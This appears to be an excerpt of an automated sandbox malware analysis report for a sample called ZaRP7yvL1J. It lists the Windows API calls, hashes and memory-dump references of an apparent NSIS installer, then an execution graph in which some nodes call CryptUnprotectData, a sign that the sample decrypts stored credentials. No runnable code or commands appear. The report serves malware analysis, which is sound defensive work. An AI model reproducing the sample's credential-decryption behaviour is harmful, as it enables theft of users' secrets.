                                                                                                            • Instruction ID: 77f958e60baede5161b3ad6efb0895c35c19b1e287786e33df862b710c35a36e
                                                                                                            • Opcode Fuzzy Hash: 5c7357d8c33c67e0b07ff50df21b06410a9f4aab9787bf9043ae3994a3357235
                                                                                                            • Instruction Fuzzy Hash: 8051C532D04159AA8B92DFF885809AEB7B9EF47318F00425BD504A72C5D770FEF187A1
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F9524D6
                                                                                                              • Part of subcall function 6F95122C: lstrcpynW.KERNEL32(00000000,?,6F9512DF,00000019,6F9511BE,-000000A0), ref: 6F95123C
                                                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 6F95245C
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F952477
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2401686688.000000006F951000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F950000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2401644043.000000006F950000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401702628.000000006F954000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401785461.000000006F956000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f950000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 4216380887-0
                                                                                                            • Opcode ID: 10595975908d9a576094c6a43d151b635b51e943e9c84affab615742ec6ee3b7
                                                                                                            • Instruction ID: e76482ac227ed294d7f83edf771d379d5039e192c0e2ca348063ba9849c198ee
                                                                                                            • Opcode Fuzzy Hash: 10595975908d9a576094c6a43d151b635b51e943e9c84affab615742ec6ee3b7
                                                                                                            • Instruction Fuzzy Hash: 1641ADB1048705DFD724DF38D844A6677B8FB9A324F10495EE4468A5C2EB70E4B9CF61
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401DBC
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                            • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                            • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                            • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F9521EC,?,00000808), ref: 6F951635
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F9521EC,?,00000808), ref: 6F95163C
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F9521EC,?,00000808), ref: 6F951650
                                                                                                            • GetProcAddress.KERNEL32(6F9521EC,00000000), ref: 6F951657
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F951660
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2401686688.000000006F951000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F950000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2401644043.000000006F950000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401702628.000000006F954000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401785461.000000006F956000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f950000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1148316912-0
                                                                                                            • Opcode ID: 36db92b57ac331ffbbe4d9f51753dea46e2f08125b002d10a75cf7994d8301ac
                                                                                                            • Instruction ID: e2da7f20898f0c8d85e3465d34ee878703e8a98d2bba4b9cbd381aa8bbd89b7b
                                                                                                            • Opcode Fuzzy Hash: 36db92b57ac331ffbbe4d9f51753dea46e2f08125b002d10a75cf7994d8301ac
                                                                                                            • Instruction Fuzzy Hash: C5F0A27210A5387BDA6116BA8C4CC9B7E9CEF8B2F5B110215F6189119085615D35DFF1
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                            • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                            • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                            • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                            • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 2659869361-3081826266
                                                                                                            • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                            • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                            • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                            • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                            APIs
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,74DF2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,74DF2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405E1E
                                                                                                            • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,74DF2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00405E2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: 0_B
                                                                                                            • API String ID: 3248276644-2128305573
                                                                                                            • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                            • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 004059E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                            • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF2EE0,00403A1A,74DF3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 1100898210-3081826266
                                                                                                            • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                            • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                            • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                            • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6F95116A
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F9511C7
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F9511D9
                                                                                                            • GlobalFree.KERNEL32(?), ref: 6F951203
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2401686688.000000006F951000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F950000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2401644043.000000006F950000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401702628.000000006F954000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401785461.000000006F956000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f950000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: db605bccde82c181a18ab3ce4115cb407772b6f2dec5a0c45b62e5aec2f3076f
                                                                                                            • Instruction ID: 7c347349a4b8a5fe30202a3ed7298960599e74766bf7fd84e12e7cf03eedda64
                                                                                                            • Opcode Fuzzy Hash: db605bccde82c181a18ab3ce4115cb407772b6f2dec5a0c45b62e5aec2f3076f
                                                                                                            • Instruction Fuzzy Hash: D63192B2508201DFEF20CF7CD945A7677E8EB57328700065AE948D72D1EB75E8B58BA0
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                            • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:11.9%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:2.2%
                                                                                                            Total number of Nodes:271
                                                                                                            Total number of Limit Nodes:17
                                                                                                            execution_graph 42759 390ee708 DispatchMessageW 42760 390ee774 42759->42760 42761 ad030 42762 ad048 42761->42762 42763 ad0a2 42762->42763 42768 390e02c8 42762->42768 42773 390e1bd0 42762->42773 42778 390e1bc0 42762->42778 42783 390e02b7 42762->42783 42769 390e02ee 42768->42769 42771 390e1bc0 3 API calls 42769->42771 42772 390e1bd0 3 API calls 42769->42772 42770 390e030f 42770->42763 42771->42770 42772->42770 42774 390e1bfd 42773->42774 42775 390e1c2f 42774->42775 42788 390e1d48 42774->42788 42798 390e1d58 42774->42798 42779 390e1bfd 42778->42779 42780 390e1c2f 42779->42780 42781 390e1d48 3 API calls 42779->42781 42782 390e1d58 3 API calls 42779->42782 42781->42780 42782->42780 42784 390e02ee 42783->42784 42786 390e1bc0 3 API calls 42784->42786 42787 390e1bd0 3 API calls 42784->42787 42785 390e030f 42785->42763 42786->42785 42787->42785 42789 390e1d66 42788->42789 42790 390e1d93 42788->42790 42792 390e1d6e 42789->42792 42812 390e1db1 42789->42812 42816 390e1dc0 42789->42816 42790->42789 42791 390e1d98 42790->42791 42808 390e17d0 42791->42808 42792->42775 42794 390e1da4 42794->42775 42795 390e1dac 42795->42775 42799 390e1d66 42798->42799 42800 390e1d93 42798->42800 42805 390e1d6e 42799->42805 42806 390e1dc0 CallWindowProcW 42799->42806 42807 390e1db1 CallWindowProcW 42799->42807 42800->42799 42801 390e1d98 42800->42801 42802 390e17d0 GetCurrentThreadId 42801->42802 42803 390e1da4 42802->42803 42803->42775 42804 390e1dac 42804->42775 42805->42775 42806->42804 42807->42804 42809 390e17db 42808->42809 42820 390e181c 42809->42820 42811 390e22f5 42811->42794 42813 390e1e02 42812->42813 42815 390e1e09 42812->42815 42814 390e1e5a CallWindowProcW 42813->42814 42813->42815 42814->42815 42815->42795 42817 390e1e02 42816->42817 42819 390e1e09 42816->42819 42818 390e1e5a CallWindowProcW 42817->42818 42817->42819 42818->42819 42819->42795 42821 390e1827 42820->42821 42822 390e2461 GetCurrentThreadId 42821->42822 42823 390e248b 42821->42823 42822->42823 42823->42811 42824 db1b7 42825 db17a 42824->42825 42826 db1bb 42824->42826 42835 38050188 42825->42835 42839 38050198 42825->42839 42827 db1a3 42843 387abd48 42827->42843 42836 380501a4 42835->42836 42859 3805c638 42836->42859 42837 380501da 42837->42827 42840 380501a4 42839->42840 42842 3805c638 CryptUnprotectData 42840->42842 42841 380501da 42841->42827 42842->42841 42844 387abd54 42843->42844 42891 387abd98 42844->42891 42847 390e2730 42848 390e273f 42847->42848 42961 390e0938 42848->42961 42853 390e2720 42854 390e273f 42853->42854 42855 390e0938 10 API calls 42854->42855 42856 390e2746 42855->42856 42857 390e188c 15 API calls 42856->42857 42858 db1b1 42857->42858 42861 3805c66a 42859->42861 42860 3805caf9 42860->42837 42861->42860 42863 3805cf01 42861->42863 42864 3805cf10 42863->42864 42868 3805d540 42864->42868 42876 3805d550 42864->42876 42865 3805cf80 42865->42861 42869 3805d575 42868->42869 42870 3805d629 42868->42870 42869->42870 42873 3805d540 CryptUnprotectData 42869->42873 42874 3805d550 CryptUnprotectData 42869->42874 42884 3805d730 42869->42884 42888 3805d1ec 42870->42888 42873->42870 42874->42870 42877 3805d575 42876->42877 42878 3805d629 42876->42878 42877->42878 42881 3805d540 CryptUnprotectData 42877->42881 42882 3805d550 CryptUnprotectData 42877->42882 42883 3805d730 CryptUnprotectData 42877->42883 42879 3805d1ec CryptUnprotectData 42878->42879 42880 3805d7f5 42879->42880 42880->42865 42881->42878 42882->42878 42883->42878 42885 3805d745 42884->42885 42886 3805d1ec CryptUnprotectData 42885->42886 42887 3805d7f5 42886->42887 42887->42870 42889 3805d9e0 CryptUnprotectData 42888->42889 42890 3805d7f5 42889->42890 42890->42865 42893 387abdb4 42891->42893 42892 db1aa 42892->42847 42892->42853 42896 387ace60 42893->42896 42900 387ace50 42893->42900 42897 387ace7c 42896->42897 42904 387a94b4 42897->42904 42899 387ace9b 42899->42892 42901 387ace7c 42900->42901 42902 387a94b4 3 API calls 42901->42902 42903 387ace9b 42902->42903 42903->42892 42905 387a94bf 42904->42905 42906 387acf4f 42905->42906 42909 387acf68 42905->42909 42913 387acf30 42905->42913 42906->42899 42912 387acf76 42909->42912 42910 387ad021 42910->42910 42912->42910 42920 387a95e8 42912->42920 42914 387acf3f 42913->42914 42918 387acf4e 42913->42918 42917 387acf68 3 API calls 42914->42917 42914->42918 42919 387acf30 3 API calls 42914->42919 42915 387ad021 42916 387a95e8 3 API calls 42916->42915 42917->42918 42918->42906 42918->42915 42918->42916 42919->42918 42921 387a95f3 42920->42921 42923 387aec47 42921->42923 42924 387ae7f4 42921->42924 42923->42910 42926 387ae7ff 42924->42926 42925 387af111 42925->42923 42926->42925 42929 387afaa1 42926->42929 42934 387afab0 42926->42934 42930 387afadb 42929->42930 42931 387afb8a 42930->42931 42939 390e0006 42930->42939 42948 390e00c0 42930->42948 42935 387afadb 42934->42935 42936 387afb8a 42935->42936 42937 390e0006 3 API calls 42935->42937 42938 390e00c0 3 API calls 42935->42938 42937->42936 42938->42936 42940 390e00fd CreateWindowExW 42939->42940 42941 390e00c9 42939->42941 42944 390e0234 42940->42944 42945 390e0006 2 API calls 42941->42945 42953 390e0110 42941->42953 42957 390e0104 42941->42957 42942 390e00f5 42942->42931 42945->42942 42949 390e00f5 42948->42949 42950 390e0006 3 API calls 42948->42950 42951 390e0104 